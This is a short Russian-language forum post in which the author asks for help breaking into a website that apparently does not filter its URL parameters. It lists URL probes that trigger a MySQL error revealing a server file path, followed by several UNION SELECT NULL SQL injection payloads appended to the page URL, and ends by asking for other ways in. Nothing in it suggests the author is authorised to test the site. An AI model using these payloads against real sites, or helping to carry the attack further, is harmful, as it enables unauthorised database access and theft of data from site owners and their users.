блин, прям незнаю что делать, я уже сдесь писал, но подумал может я мало описал проблему.... значит так, попытка два:

видно что сайт не фильтрует входящие параметры...

somesite.ru/idpage_6/do_1/idn_328.htm - общий вид
somesite.ru/idpage_6/do_1/idn_328.ht - порождает ошибку
somesite.ru/idpage_6/do_1/idn_328.htm` - порождает ошибку
somesite.ru/idpage_6/do_1/idn_ - порождает ошибку
somesite.ru/idpage_6/do_1/idn_328` - порождает ошибку

ошибка одна и таже:

Query error


Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /common/www/html/somesite/ind_6.php on line 275 (номер строки меняется)


somesite.ru/idpage_6/do_1/idn_328.htm+union+select+null[null,null...]/*

somesite.ru/idpage_6/do_1/idn_328.htm`+union+select+null[null,null...]/*

somesite.ru/idpage_6/do_1/idn_328+union+select+null[null,null...]/*

somesite.ru/idpage_6/do_1/idn_328`+union+select+null[null,null...]/*

(а также, все тоже, но вместо "+" - "%20")
все эти запросы также порождают одну и ту же ошибку... никаких тебе "дифферент колумс" и т.п.

есть ли другие способы?